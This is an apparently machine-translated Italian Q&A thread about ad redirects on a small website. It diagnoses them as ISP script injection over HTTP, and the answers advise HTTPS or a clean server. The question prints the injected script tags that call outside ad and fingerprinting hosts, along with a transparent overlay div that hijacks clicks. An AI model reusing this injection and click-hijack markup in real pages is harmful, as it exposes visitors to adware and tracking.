it-swarm-eu.dev

script sconosciuti sono in esecuzione e reindirizzamento sul clic su siti Web sconosciuti

Problema: - A volte, cliccando sul menu NAVBAR o su qualsiasi div sul mio sito web di bootstrap, reindirizza ad annunci o link sconosciuti in una nuova scheda qualcosa del genere. 

http://cobalten.com/afu.php?zoneid=1365143&var=1492756

Link importati dal file ospitato: - 

<link rel="stylesheet" type="text/css" href="css\bootstrap.min.css">

    <script src="js/jquery.min.js"></script>
    <script src="js/main.js"></script>
    <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js"></script>


    <link rel="stylesheet" type="text/css" href="css\style.css">

    <link href="https://fonts.googleapis.com/css?family=Montserrat" rel="stylesheet" type="text/css">

    <link href="https://fonts.googleapis.com/css?family=Lato" rel="stylesheet" type="text/css">

    <link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.0.8/css/all.css" integrity="shaxxx-xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"
        crossorigin="anonymous">

<script src="https://maps.googleapis.com/maps/api/js?key=xxxxxxxxxxxxxxxxxxxxxxxxxx&callback=myMap "></script>

Cosa ho ottenuto in Ispezione: - 

Ho controllato il mio codice più volte quando non c'è reindirizzamento sul menu di scelta. Non ho trovato nulla di sospetto ... MA POI quando ho ricevuto i collegamenti di reindirizzamento al clic, ho controllato il mio codice nel browser e posso vedere chiaramente poche fonti di script aggiunto ai miei file (può vedere in modalità di ispezione solo nei browser). Non sono scritti sul mio codice. Parti sconosciute del mio codice sono ..

1) QUI I seguenti 2 script sostituiscono lo script js/jquery.min.js nel tag head 

<script src='//117.240.205.115:3000/getjs?nadipdata="%7B%22url%22:%22%2Fjs%2Fjquery.min.js%22%2C%22referer%22:%22http:%2F%2Famans.xyz%2F%22%2C%22Host%22:%22amans.xyz%22%2C%22categories%22:%5B0%5D%2C%22reputations%22:%5B1%5D%7D"&amp;screenheight=768&amp;screenwidth=1360&amp;tm=1530041241377&amp;lib=true&amp;fingerprint=c2VwLW5vLXJlZGlyZWN0' async=""></script>

<script src="http://amans.xyz/js/jquery.min.js?cb=1530041241381&amp;fingerprint=c2VwLW5vLXJlZGlyZWN0&amp;onIframeFlag" type="text/javascript"></script>

2) Questo viene aggiunto al tag del corpo subito dopo aver importato google api

<span id="notiMain">
<script src="//go.oclasrv.com/apu.php?zoneid=1492761" type="text/javascript">< /script>
</span>

3) Questo è anche nel tag del corpo.

<div class="pxdouz70egp12" style="left: 0px; top: 9360px; width: 658px; height: 650px; background-image: url("data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7"); position: absolute; z-index: 2000; </div>

4) Durante l'ispezione Il collegamento di reindirizzamento. Informazioni su THE HEADERS: -

Request URL: http://cobalten.com/apu.php?zoneid=1492761&_=1530105294644
Request Method: GET
Status Code: 200 OK
Remote Address: 188.42.162.184:80
Referrer Policy: no-referrer-when-downgrade
Cache-Control: private, max-age=0, no-cache
Connection: keep-alive
Content-Encoding: gzip
Content-Type: application/x-javascript
Date: Wed, 27 Jun 2018 13:14:57 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Pragma: no-cache
Server: nginx
Strict-Transport-Security: max-age=1
Timing-Allow-Origin: *, *
Transfer-Encoding: chunked
X-Content-Type-Options: nosniff
X-Used-AdExchange: 1
Provisional headers are shown
Referer: http://amans.xyz/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36
zoneid: 1492761
_: 1530105294644

Quello che ho provato: - 

Il mio codice è pulito e non esiste uno script che lo stia reindirizzando da qualche parte. Potrebbe essere il mio browser o Windows a essere compromesso. Ho controllato il sito web da 3 browser Edge, CHROME, FIREFOX .. ha lo stesso problema. poi ho aggiornato a Windows 10 da Win7 e ho fatto una nuova installazione. Ma non è successo niente. Poi ho pensato di chiedere il supporto di Hostgator se il server è stato compromesso hanno risposto correttamente dalla loro fine ... Ho installato malwarebytes e tutti i software per risolverlo ... ma loro hanno solo comunicato che chrome/firefox/Edge sta reindirizzando verso l'outbound ID con alcuni nomi di dominio per lo più go.oclasrv.com e non fare nulla. 

**

QUALSIASI SOLUZIONE ???

**

AGGIORNARE:-

Ho ottenuto un reindirizzamento simile sul link di feedback del supporto di Hostgator ..

On noticing, Qui il nome di dominio in stringa è sostituito da rateus.in Zoneid = 1492761 è lo stesso qualsiasi link non protetto che apro .. Anche cb = xxxxxxxxxxxx e tm = xxxxxxxxxxx è cambiato per diversi link e impronte digitali = c2VwLW5vLXJlZGlyZWN0 è uguale per tutti i link che apro.

<script async="" src="//117.240.205.115:3000/getjs?nadipdata=&quot;%7B%22url%22:%22%2Fcommon%2Fjs%2Fjquery-1.7.1.js%22%2C%22referer%22:%22http:%2F%2Frateus.co.in%2Findex.php%3Fbrowse%3DHostGatorIN_Chat_HGIChatCSAT%22%2C%22Host%22:%22rateus.co.in%22%2C%22categories%22:%5B0%5D%2C%22reputations%22:%5B1%5D%7D&quot;&amp;screenheight=768&amp;screenwidth=1360&amp;tm=1530191489196&amp;lib=true&amp;fingerprint=c2VwLW5vLXJlZGlyZWN0"></script>

<script type="text/javascript" src="http://rateus.co.in/common/js/jquery-1.7.1.js?cb=1530191489199&amp;fingerprint=c2VwLW5vLXJlZGlyZWN0&amp;onIframeFlag"></script>

<span id="notiMain"><script type="text/javascript" src="//go.oclasrv.com/apu.php?zoneid=1492761"></script></span>

Il mio sistema operativo è completamente aggiornato a WIN10 pro e ho installato solo Chrome senza plugin ...

Il problema è indipendente dal browser poiché ho ottenuto gli stessi risultati su Edge e Firefox.

QUALSIASI ESPERTO JS CHE MI PU HEL AIUTARMI QUI

9
aman

Questo sembra essere un caso di ISP che inietta i file JavaScript. Sei per caso sulla banda larga BSNL ?. Negli ultimi giorni, BSNL sembra iniettare siti Adware su HTTP (non crittografati).

L'unica soluzione che conosco è Ospitare il tuo sito su https OR cambiare il tuo ISP.

8
Jayson Chacko

Questo problema che si sta verificando è lato server. Probabilmente non c'è niente di sbagliato nel tuo codice, tuttavia il server è stato infettato da malware che ha iniettato questo codice errato nel tuo sito web.

Per risolvere questo, vorrei fare un backup del codice che hai scritto, cambiare le tue password di hosting FTP, cancellare il tuo server e aggiungere il tuo codice. Se ciò non risolve il problema, cambierei i provider di hosting.

1
Jake Chasan

Se si vede uno script sconosciuto iniettato dai seguenti IP, allora è il file di script iniettato dall'ISP BSNL.

61.0.245.90, 117.205.13.171

Questi script vengono iniettati solo quando si visitano siti Web HTTP. HTTPS implica Transport Layer Security in modo che non possa essere manomesso dall'ISP. 

I file di script di questo IP sono solo un conduit, che scarica ulteriori script AD da diversi media AD. La maggior parte di questo supporto AD segue la pubblicità intrusiva, rubando i clic del mouse dell'utente per aprire i propri popup. 

Scusa BSNL per tale attività è che è una funzionalità per migliorare l'esperienza di navigazione per i propri abbonati. C'è un post dettagliato scritto su BSNL che inietta tali script e su come fermarli. 

0
David Chelliah